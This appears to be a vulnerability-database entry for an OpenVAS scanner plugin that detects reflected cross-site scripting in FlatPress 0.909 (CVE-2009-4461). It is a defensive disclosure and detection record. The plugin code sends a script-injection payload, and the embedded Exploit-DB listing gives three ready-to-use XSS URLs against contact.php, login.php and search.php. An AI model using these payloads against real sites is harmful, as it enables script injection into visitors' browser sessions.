FlatPress Multiple Cross site Scripting Vulnerabilities
2010-01-22T00:00:00
ID OPENVAS:800284 Type openvas Reporter Copyright (c) 2010 Greenbone Networks GmbH Modified 2017-02-16T00:00:00
Description
This host is running FlatPress and is prone to multiple Cross Site
Scripting vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_flatpress_mult_xss_vuln.nasl 5306 2017-02-16 09:00:16Z teissa $
#
# FlatPress Multiple Cross site Scripting Vulnerabilities
#
# Authors:
# Madhuri D <dmadhuri@secpod.com>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will let the remote attacker to execute arbitrary web
script or HTML code in a user's browser session in the context of an affected
site.
Impact Level: Application";
tag_affected = "FlatPress version 0.909 and prior.";
tag_insight = "The flaws are due to error in 'contact.php','login.php' and
'search.php' that fail to sufficiently sanitize user-supplied data via the
PATH_INFO.";
tag_solution = "Upgrade to FlatPress version 0.909.1,
For updates refer to http://sourceforge.net/projects/flatpress/files/";
tag_summary = "This host is running FlatPress and is prone to multiple Cross Site
Scripting vulnerabilities.";
if(description)
{
script_id(800284);
script_version("$Revision: 5306 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-16 10:00:16 +0100 (Thu, 16 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-01-22 09:23:45 +0100 (Fri, 22 Jan 2010)");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_cve_id("CVE-2009-4461");
script_bugtraq_id(37471);
script_name("FlatPress Multiple Cross site Scripting Vulnerabilities");
script_xref(name : "URL" , value : "http://secunia.com/advisories/37938");
script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/10688");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_MIXED_ATTACK);
script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("flatpress_detect.nasl");
script_require_ports("Services/www", 80);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("version_func.inc");
include("http_func.inc");
fpPort = get_http_port(default:80);
if(!fpPort){
exit(0);
}
flatVer = get_kb_item("www/" + fpPort + "/flatpress");
if(!flatVer){
exit(0);
}
flatVer = eregmatch(pattern:"^(.+) under (/.*)$", string:flatVer);
if(!safe_checks() && flatVer[2] != NULL)
{
sndReq = http_get(item:string(flatVer[2], "/contact.php/>'><ScRiPt>" +
"alert('+213567778899')</ScRiPt>"), port:fpPort);
rcvRes = http_send_recv(port:fpPort, data:sndReq);
if(rcvRes =~ "HTTP/1\.. 200" && ("<ScRiPt>alert('+213567778899')</ScRiPt>" >< rcvRes))
{
security_message(fpPort);
exit(0);
}
}
if(flatVer[1] != NULL)
{
if(version_is_less_equal(version:flatVer[1], test_version:"0.909")){
security_message(fpPort);
}
}
{"id": "OPENVAS:800284", "type": "openvas", "bulletinFamily": "scanner", "title": "FlatPress Multiple Cross site Scripting Vulnerabilities", "description": "This host is running FlatPress and is prone to multiple Cross Site\n Scripting vulnerabilities.", "published": "2010-01-22T00:00:00", "modified": "2017-02-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=800284", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/37938", "http://www.exploit-db.com/exploits/10688"], "cvelist": ["CVE-2009-4461"], "lastseen": "2017-07-02T21:09:51", "viewCount": 1, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2017-07-02T21:09:51", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4461"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800284"]}, {"type": "exploitdb", "idList": ["EDB-ID:10688"]}], "modified": "2017-07-02T21:09:51", "rev": 2}, "vulnersScore": 4.7}, "pluginID": "800284", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_flatpress_mult_xss_vuln.nasl 5306 2017-02-16 09:00:16Z teissa $\n#\n# FlatPress Multiple Cross site Scripting Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the remote attacker to execute arbitrary web\n script or HTML code in a user's browser session in the context of an affected\n site.\n Impact Level: Application\";\ntag_affected = \"FlatPress version 0.909 and prior.\";\ntag_insight = \"The flaws are due to error in 'contact.php','login.php' and\n 'search.php' that fail to sufficiently sanitize user-supplied data via the\n PATH_INFO.\";\ntag_solution = \"Upgrade to FlatPress version 0.909.1,\nFor updates refer to http://sourceforge.net/projects/flatpress/files/\";\ntag_summary = \"This host is running FlatPress and is prone to multiple Cross Site\n Scripting vulnerabilities.\";\n\nif(description)\n{\n script_id(800284);\n script_version(\"$Revision: 5306 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-16 10:00:16 +0100 (Thu, 16 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 09:23:45 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4461\");\n script_bugtraq_id(37471);\n script_name(\"FlatPress Multiple Cross site Scripting Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37938\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/10688\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"flatpress_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"http_func.inc\");\n\nfpPort = get_http_port(default:80);\nif(!fpPort){\n exit(0);\n}\n\nflatVer = get_kb_item(\"www/\" + fpPort + \"/flatpress\");\nif(!flatVer){\n exit(0);\n}\n\nflatVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:flatVer);\nif(!safe_checks() && flatVer[2] != NULL)\n{\n sndReq = http_get(item:string(flatVer[2], \"/contact.php/>'><ScRiPt>\" +\n \"alert('+213567778899')</ScRiPt>\"), port:fpPort);\n rcvRes = http_send_recv(port:fpPort, data:sndReq);\n if(rcvRes =~ \"HTTP/1\\.. 200\" && (\"<ScRiPt>alert('+213567778899')</ScRiPt>\" >< rcvRes))\n {\n security_message(fpPort);\n exit(0);\n }\n}\n\nif(flatVer[1] != NULL)\n{\n if(version_is_less_equal(version:flatVer[1], test_version:\"0.909\")){\n security_message(fpPort);\n }\n}\n", "naslFamily": "Web application abuses"}
{"cve": [{"lastseen": "2021-02-02T05:40:08", "description": "Multiple cross-site scripting (XSS) vulnerabilities in FlatPress 0.909 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) contact.php, (2) login.php, and (3) search.php.", "edition": 4, "cvss3": {}, "published": "2009-12-30T20:00:00", "title": "CVE-2009-4461", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4461"], "modified": "2009-12-30T20:00:00", "cpe": ["cpe:/a:flatpress:flatpress:0.909"], "id": "CVE-2009-4461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4461", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:flatpress:flatpress:0.909:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-27T19:23:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4461"], "description": "This host is running FlatPress and is prone to multiple Cross Site Scripting\nvulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-01-22T00:00:00", "id": "OPENVAS:1361412562310800284", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800284", "type": "openvas", "title": "FlatPress Multiple Cross site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# FlatPress Multiple Cross site Scripting Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:flatpress:flatpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800284\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 09:23:45 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4461\");\n script_bugtraq_id(37471);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"FlatPress Multiple Cross site Scripting Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37938\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/10688\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"flatpress_detect.nasl\");\n script_mandatory_keys(\"flatpress/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote attacker to execute arbitrary web\nscript or HTML code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"FlatPress version 0.909 and prior.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to error in 'contact.php', 'login.php' and 'search.php'\nthat fail to sufficiently sanitize user-supplied data via the PATH_INFO.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to FlatPress version 0.909.1.\");\n\n script_tag(name:\"summary\", value:\"This host is running FlatPress and is prone to multiple Cross Site Scripting\nvulnerabilities.\");\n\n script_xref(name:\"URL\", value:\"http://sourceforge.net/projects/flatpress/files/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"http_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"0.909\")) {\n report = report_fixed_ver(installed_version:version, vulnerable_range:\"Less than or equal to 0.909\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-01T12:59:00", "description": "FlatPress Cross Site Scripting Vulnerability. CVE-2009-4461. Webapps exploit for php platform", "published": "2009-12-26T00:00:00", "type": "exploitdb", "title": "FlatPress Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4461"], "modified": "2009-12-26T00:00:00", "id": "EDB-ID:10688", "href": "https://www.exploit-db.com/exploits/10688/", "sourceData": "======================================================================================== \r\n| # Title : FlatPress Cross Site Scripting Vulnerability |\r\n| # Author : indoushka |\r\n| # email : indoushka@hotmail.com |\r\n| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |\r\n| # Web Site : www.iq-ty.com |\r\n| # Script : powered by FlatPress / http://www.flatpress.org/ |\r\n| # Tested on: windows SP2 Fran\u0e23\u0e07ais V.(Pnx2 2.0) + Lunix Fran\u0e23\u0e07ais v.(9.4 Ubuntu) |\r\n| # Bug : XSS | \r\n====================== Exploit By indoushka =================================\r\n| # Exploit : \r\n| \r\n| 1- http://server/flatpress/contact.php/>\"><ScRiPt>alert(+213771818860)</ScRiPt>\r\n| 2- http://server/flatpress/login.php/>\"><ScRiPt>alert(+213771818860)</ScRiPt>\r\n| 3- http://server/flatpress/search.php/>\"><ScRiPt>alert(+213771818860)</ScRiPt>\r\n|\r\n================================ Dz-Ghost Team ========================================\r\nGreetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |\r\n-------------------------------------------------------------------------------------------\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/10688/"}]}
